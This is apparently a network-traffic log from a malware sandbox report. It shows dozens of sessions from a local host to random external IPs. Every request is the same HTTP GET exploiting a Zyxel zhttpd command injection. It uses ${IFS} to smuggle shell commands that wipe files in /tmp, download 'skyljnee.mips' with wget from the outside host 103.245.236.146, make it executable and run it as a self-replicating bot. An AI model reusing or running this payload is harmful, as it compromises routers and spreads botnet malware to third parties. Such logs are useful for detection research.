                                                Jan 28, 2024 10:16:31.910186052 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6101192.168.2.2349288105.138.92.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910204887 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6102192.168.2.2333128121.100.225.150443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910227060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6103192.168.2.235899043.179.74.205443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910248995 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6104192.168.2.2348758119.28.186.38443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910284996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6105192.168.2.2344590112.5.248.231443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910306931 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6106192.168.2.2351176108.178.164.236443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910325050 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6107192.168.2.234823879.31.153.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910358906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6108192.168.2.235813246.183.47.91443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910397053 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6109192.168.2.2343598131.243.31.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910418987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6110192.168.2.234480064.49.253.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910451889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6111192.168.2.234096864.45.213.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910479069 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6112192.168.2.2349978197.9.176.44443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910506010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6113192.168.2.2338966211.128.9.32443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910540104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6114192.168.2.235653071.30.98.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910547972 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6115192.168.2.233399234.246.215.70443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910581112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6116192.168.2.234200034.72.74.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910593987 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6117192.168.2.233374291.11.59.92443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910613060 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6118192.168.2.234228281.217.63.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910648108 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6119192.168.2.2336386178.93.174.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910713911 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6120192.168.2.2355364166.206.149.191443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910715103 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6121192.168.2.235702872.1.155.177443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910753965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6122192.168.2.233633835.186.217.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910787106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6123192.168.2.2340824131.157.135.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910808086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6124192.168.2.2360018108.90.222.36443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910830975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6125192.168.2.2337184106.120.60.146443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910851955 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6126192.168.2.235542840.106.84.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910876989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6127192.168.2.234910068.1.167.189443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910891056 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6128192.168.2.2332814141.160.176.76443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910912037 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6129192.168.2.2350980102.147.28.9443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910928965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6130192.168.2.2354810144.65.18.218443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910943985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6131192.168.2.235530489.96.249.198443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.910967112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6132192.168.2.2359000177.159.159.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911000013 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6133192.168.2.2360774177.151.233.149443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911019087 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6134192.168.2.233513242.159.79.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911051989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6135192.168.2.2342846190.67.17.224443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911102057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6136192.168.2.2342742113.187.50.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911102057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6137192.168.2.233634240.102.225.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911108971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6138192.168.2.234780883.80.143.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911118984 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6139192.168.2.2336696120.220.8.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911154985 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6140192.168.2.235883264.138.182.35443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911199093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6141192.168.2.2345232146.22.3.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911206961 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6142192.168.2.2338708167.80.149.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911247015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6143192.168.2.235244290.168.107.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911269903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6144192.168.2.2345726111.132.98.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911286116 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6145192.168.2.2351828180.2.50.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911336899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6146192.168.2.2352962168.232.39.229443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911348104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6147192.168.2.2337248209.57.24.147443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911382914 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6148192.168.2.233933043.247.183.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911412954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6149192.168.2.234187481.193.123.249443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911434889 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6150192.168.2.2341396154.122.234.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911479950 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6151192.168.2.2344050154.121.70.7443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911508083 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6152192.168.2.2335182143.75.169.111443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911514997 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6153192.168.2.2355230119.99.222.170443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911523104 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6154192.168.2.235622634.203.131.247443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911561012 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6155192.168.2.2356332176.112.143.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911580086 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6156192.168.2.2351720159.146.21.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911613941 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6157192.168.2.234458448.100.2.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911628962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6158192.168.2.235011836.156.186.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911652088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6159192.168.2.234637677.10.141.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911680937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6160192.168.2.2332812197.142.208.65443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911705971 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6161192.168.2.2336736138.214.54.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:31.911736965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                6162192.168.2.2353626117.90.87.112443
                                                TimestampBytes transferredDirectionData
